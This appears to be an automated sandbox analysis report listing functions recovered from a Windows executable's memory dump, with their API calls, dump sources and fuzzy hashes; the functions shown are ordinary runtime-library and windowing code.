                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 012898F9
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0128990C
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0128991F
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 01289932
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 01289945
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 01289958
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0128996B
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0128997E
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 01289991
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 012899A4
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 012899B7
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 012899CA
                                                                                                                  • Part of subcall function 0128615A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 012899DD
                                                                                                                • __mtinitlocks.LIBCMT ref: 01288D85
                                                                                                                • __mtterm.LIBCMT ref: 01288D8E
                                                                                                                  • Part of subcall function 01288DF6: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,01288D93,01283765,012A7630,00000014), ref: 0128E070
                                                                                                                  • Part of subcall function 01288DF6: _free.LIBCMT ref: 0128E077
                                                                                                                  • Part of subcall function 01288DF6: DeleteCriticalSection.KERNEL32(012AAD40,?,?,01288D93,01283765,012A7630,00000014), ref: 0128E099
                                                                                                                • __calloc_crt.LIBCMT ref: 01288DB3
                                                                                                                • __initptd.LIBCMT ref: 01288DD5
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 01288DDC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3567560977-0
                                                                                                                • Opcode ID: eed5e0356631f1657b442c7650ef8025ba08ccef22b7180f0e15bcfe5d8e3dce
                                                                                                                • Instruction ID: be53c74e9905b433efb517df07b59df175d2b48f8dab746d7d8a32d14cf672a2
                                                                                                                • Opcode Fuzzy Hash: eed5e0356631f1657b442c7650ef8025ba08ccef22b7180f0e15bcfe5d8e3dce
                                                                                                                • Instruction Fuzzy Hash: 6FF09A3257B6135BEA387A7D7C06A6B3BC09F72634BA00A6AE660E51C5FF2094419394
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01271117, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(shell32.dll,?,?,01272291,012A0E18,00000000,00000000,?,00000008,0129BD34,?,?,012715AB,?,?,00000000), ref: 01271129
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 01271139
                                                                                                                • EncodePointer.KERNEL32(00000000,?,?,01272291,012A0E18,00000000,00000000,?,00000008,0129BD34,?,?,012715AB,?,?,00000000), ref: 01271142
                                                                                                                • DecodePointer.KERNEL32(00000000,?,?,01272291,012A0E18,00000000,00000000,?,00000008,0129BD34,?,?,012715AB,?,?,00000000), ref: 01271150
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                                • API String ID: 2061474489-2936008475
                                                                                                                • Opcode ID: 95d0af6d3a70ecd405743472473fac22d05ca548c2d3e82d8b92305bdf9f19fc
                                                                                                                • Instruction ID: 726b7f05228a997884208644ec452d055cd17f81d85e68adb4a661e1e74c0848
                                                                                                                • Opcode Fuzzy Hash: 95d0af6d3a70ecd405743472473fac22d05ca548c2d3e82d8b92305bdf9f19fc
                                                                                                                • Instruction Fuzzy Hash: 36F01236961316BFDF216F6DBC0D96B3FA8AF09B657004158FE09EA214D772D8608B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01271063, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,012645BF,?,?,?,?), ref: 01271075
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 01271085
                                                                                                                • EncodePointer.KERNEL32(00000000,?,?,012645BF,?,?,?,?), ref: 0127108E
                                                                                                                • DecodePointer.KERNEL32(00000000,?,?,012645BF,?,?,?,?), ref: 0127109C
                                                                                                                Strings
                                                                                                                • RegisterApplicationRecoveryCallback, xrefs: 0127107F
                                                                                                                • kernel32.dll, xrefs: 01271070
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                • String ID: RegisterApplicationRecoveryCallback$kernel32.dll
                                                                                                                • API String ID: 2061474489-202725706
                                                                                                                • Opcode ID: b5d8077cd8c599b0406ef31e6507a4e366980cf35f603e6b7e51f40dbc45b70a
                                                                                                                • Instruction ID: 30c02bea200419a8953f0ca86586ddea6e077e65eb9352d3f7540356689886a2
                                                                                                                • Opcode Fuzzy Hash: b5d8077cd8c599b0406ef31e6507a4e366980cf35f603e6b7e51f40dbc45b70a
                                                                                                                • Instruction Fuzzy Hash: 6DF05431A50316ABDF325F6CAC099AB3BA9AF086657040159FE05D6114D772D4608B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01270DDA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000028,?,01263AFF,00000000,00000000,?,?,80070057,00000034,00000028,00000000,00000034,?,01263A5B,00000000), ref: 01270DEC
                                                                                                                • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryInProgress), ref: 01270DFC
                                                                                                                • EncodePointer.KERNEL32(00000000,?,01263AFF,00000000,00000000,?,?,80070057,00000034,00000028,00000000,00000034,?,01263A5B,00000000,00000000), ref: 01270E05
                                                                                                                • DecodePointer.KERNEL32(00000000,00000028,?,01263AFF,00000000,00000000,?,?,80070057,00000034,00000028,00000000,00000034,?,01263A5B,00000000), ref: 01270E13
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                • String ID: ApplicationRecoveryInProgress$kernel32.dll
                                                                                                                • API String ID: 2061474489-2899047487
                                                                                                                • Opcode ID: d80378922aa1057675267ec77e488746fe7ef5da3b7a6e3b6e0d5cacd29b8017
                                                                                                                • Instruction ID: 7115e4ca41688e07422f9006daf78127743da8c3773541008e04afa4ed1ed997
                                                                                                                • Opcode Fuzzy Hash: d80378922aa1057675267ec77e488746fe7ef5da3b7a6e3b6e0d5cacd29b8017
                                                                                                                • Instruction Fuzzy Hash: CDF03031961716EBAF311B7CB90D96B3A9CAE0D7A43000568FE06EA215D671DC8087A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012701A9, Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(0000000F), ref: 012701B5
                                                                                                                • GetSysColor.USER32(00000010), ref: 012701BC
                                                                                                                • GetSysColor.USER32(00000014), ref: 012701C3
                                                                                                                • GetSysColor.USER32(00000012), ref: 012701CA
                                                                                                                • GetSysColor.USER32(00000006), ref: 012701D1
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 012701DE
                                                                                                                • GetSysColorBrush.USER32(00000006), ref: 012701E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Color$Brush
                                                                                                                • String ID:
                                                                                                                • API String ID: 2798902688-0
                                                                                                                • Opcode ID: 1a5e5df949ce1730402ced3766255ac30e74135ca11f906de8e4088c3ba1fffe
                                                                                                                • Instruction ID: ab3c84e275523a5683f2e981b954365a33f248b3787992317cb1c41eb99b457f
                                                                                                                • Opcode Fuzzy Hash: 1a5e5df949ce1730402ced3766255ac30e74135ca11f906de8e4088c3ba1fffe
                                                                                                                • Instruction Fuzzy Hash: A4F0FE71E407296BDB209F7599097867E90FB44720F00152BA2088BA80D7B6A460DFC0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01270D8D, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000001,?,01263B2B,00000001,?,?,80070057,00000034,00000028,00000000,00000034,?,01263A5B,00000000,00000000), ref: 01270D9F
                                                                                                                • GetProcAddress.KERNEL32(00000000,ApplicationRecoveryFinished), ref: 01270DAF
                                                                                                                • EncodePointer.KERNEL32(00000000,?,01263B2B,00000001,?,?,80070057,00000034,00000028,00000000,00000034,?,01263A5B,00000000,00000000,00000034), ref: 01270DB8
                                                                                                                • DecodePointer.KERNEL32(00000000,00000001,?,01263B2B,00000001,?,?,80070057,00000034,00000028,00000000,00000034,?,01263A5B,00000000,00000000), ref: 01270DC6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                                                                • String ID: ApplicationRecoveryFinished$kernel32.dll
                                                                                                                • API String ID: 2061474489-1962646049
                                                                                                                • Opcode ID: 0cb306a0a51a782ff54dd18b3cdd217313a58cefce6d2a1c2191b73c853a8e14
                                                                                                                • Instruction ID: 9af326be85fe15e81bf2598b8a79afb9a669f327044a62da4506ac259f8f8b7a
                                                                                                                • Opcode Fuzzy Hash: 0cb306a0a51a782ff54dd18b3cdd217313a58cefce6d2a1c2191b73c853a8e14
                                                                                                                • Instruction Fuzzy Hash: 35E0E571912316AF9F215B7DB80D9BF3A9CDF056697040169FE05E2118E671E4C087A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127BF05, Relevance: 9.4, APIs: 6, Instructions: 413COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0127BF0F
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0127BF72
                                                                                                                  • Part of subcall function 01268275: __CxxThrowException@8.LIBCMT ref: 01268289
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0127C19E
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0127C20B
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0127C437
                                                                                                                  • Part of subcall function 0127E4D0: VariantCopy.OLEAUT32(?,?), ref: 0127E4DF
                                                                                                                  • Part of subcall function 0126337D: __EH_prolog3.LIBCMT ref: 01263384
                                                                                                                  • Part of subcall function 0127E430: __EH_prolog3_GS.LIBCMT ref: 0127E43A
                                                                                                                  • Part of subcall function 0127E430: _strlen.LIBCMT ref: 0127E45A
                                                                                                                  • Part of subcall function 0127E430: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 0127E462
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$H_prolog3_$AllocByteCopyException@8H_prolog3StringThrow_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3550692133-0
                                                                                                                • Opcode ID: d3353b55dd41df72a8f775a5bd81864e3c06597301a9fad8ec3d99b0a185437d
                                                                                                                • Instruction ID: ab4f2ee0dd353e0a99d6bf87a4195381a012a282c5d00300ea8de16c48b857f7
                                                                                                                • Opcode Fuzzy Hash: d3353b55dd41df72a8f775a5bd81864e3c06597301a9fad8ec3d99b0a185437d
                                                                                                                • Instruction Fuzzy Hash: 95E1AA3082025AEADF25EBA4C994BFFBBB9EF18304F1040DAE645B7180DB745E54CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127ACBB, Relevance: 9.1, APIs: 6, Instructions: 123COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FreeString$_memset$ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1093528453-0
                                                                                                                • Opcode ID: 4b1e8783517ea2868ec1e04dd719d372bb597b15881de1b679c1766ec323294a
                                                                                                                • Instruction ID: 2e78086a544a7c9a29a7335fe881ec69bbe0c0b3e8ec73deab5f138d724fc5a9
                                                                                                                • Opcode Fuzzy Hash: 4b1e8783517ea2868ec1e04dd719d372bb597b15881de1b679c1766ec323294a
                                                                                                                • Instruction Fuzzy Hash: 9E416D71921219EFCF14DFA9C884EEEBB78FF44725F44802AF619A7144C770AA44CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012808C4, Relevance: 9.1, APIs: 6, Instructions: 116memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 012808E5
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 01280942
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0128096C
                                                                                                                  • Part of subcall function 012633C1: __EH_prolog3.LIBCMT ref: 012633C8
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 012809C1
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 012809F0
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 01280A27
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocString$H_prolog3_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 842698744-0
                                                                                                                • Opcode ID: f49be5073ac6646ed7928a68685a918fc0f77ac212a6b9d2b801c9a6a0a343f2
                                                                                                                • Instruction ID: 7e02895b9d4bf4561ab51647942fad721239ff9ee67c7b05c984f6e6b66fa6d1
                                                                                                                • Opcode Fuzzy Hash: f49be5073ac6646ed7928a68685a918fc0f77ac212a6b9d2b801c9a6a0a343f2
                                                                                                                • Instruction Fuzzy Hash: 5041507191020ADFDB20EF29D880AE9F3B9BF65310F0045AAD59A972D0DF70A9D4CF85
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127D9A1, Relevance: 9.1, APIs: 6, Instructions: 83windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$LongParentVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 506644340-0
                                                                                                                • Opcode ID: 261a5abf484029fad4926d9c7cfee9e4982c5824f3a83867c9ebbe80b8c936c2
                                                                                                                • Instruction ID: 75bd80b3330162e069ac1072456f5c327596c8d25f5be6a3b175ddb476d57588
                                                                                                                • Opcode Fuzzy Hash: 261a5abf484029fad4926d9c7cfee9e4982c5824f3a83867c9ebbe80b8c936c2
                                                                                                                • Instruction Fuzzy Hash: 3E21503263462AABEB327AB89C49B7B7B6DBF44690F044114BE45A7250D631EC4087A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012650F7, Relevance: 9.1, APIs: 6, Instructions: 66registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0126511F
                                                                                                                • RegDeleteValueA.ADVAPI32(00000000,?,?,00000000), ref: 0126513F
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 01265166
                                                                                                                  • Part of subcall function 01264A35: RegCloseKey.ADVAPI32(00000000), ref: 01264ADD
                                                                                                                  • Part of subcall function 01264A35: RegCloseKey.ADVAPI32(00000000), ref: 01264AE8
                                                                                                                • _strlen.LIBCMT ref: 0126514E
                                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,?,?,00000001,?,00000000), ref: 0126515D
                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 01265181
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Close$DeleteValue$PrivateProfileStringWrite_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 498930969-0
                                                                                                                • Opcode ID: 803d9e98511d20d1d2d15f1ba077fb69196002f55a379734dfeb5bc583d5f3af
                                                                                                                • Instruction ID: bd20a704532ded3d8df645d1702cdaeb5c7bcc099d0ae3f20b6527e32e1892eb
                                                                                                                • Opcode Fuzzy Hash: 803d9e98511d20d1d2d15f1ba077fb69196002f55a379734dfeb5bc583d5f3af
                                                                                                                • Instruction Fuzzy Hash: 0C11E537530252FBCF331E689C48EBB3B6DEF452E0B0140A4FE559A180CA31C8D28BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012654A2, Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowLongA.USER32 ref: 012654CB
                                                                                                                • GetParent.USER32(00000028), ref: 012654D9
                                                                                                                • GetParent.USER32(00000028), ref: 012654F0
                                                                                                                • GetLastActivePopup.USER32(00000028), ref: 01265503
                                                                                                                • IsWindowEnabled.USER32(00000028), ref: 01265517
                                                                                                                • EnableWindow.USER32(00000028,00000000), ref: 0126552A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                • String ID:
                                                                                                                • API String ID: 670545878-0
                                                                                                                • Opcode ID: a5669e5c4ee2f8164af607060176bacb400204c94dda69a88efa40f4f056f6c7
                                                                                                                • Instruction ID: 38afeabc6d6c3ba827c0459c33863afb40fb21dfbdd5266bac4044531f1d018e
                                                                                                                • Opcode Fuzzy Hash: a5669e5c4ee2f8164af607060176bacb400204c94dda69a88efa40f4f056f6c7
                                                                                                                • Instruction Fuzzy Hash: 0211A73132162357AB325E6DB98C76E679DEF55AE6F050158EF05D72C4DB20C88086E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01279CCC, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 288memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Task$AllocFreeH_prolog3__memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3303116700-3916222277
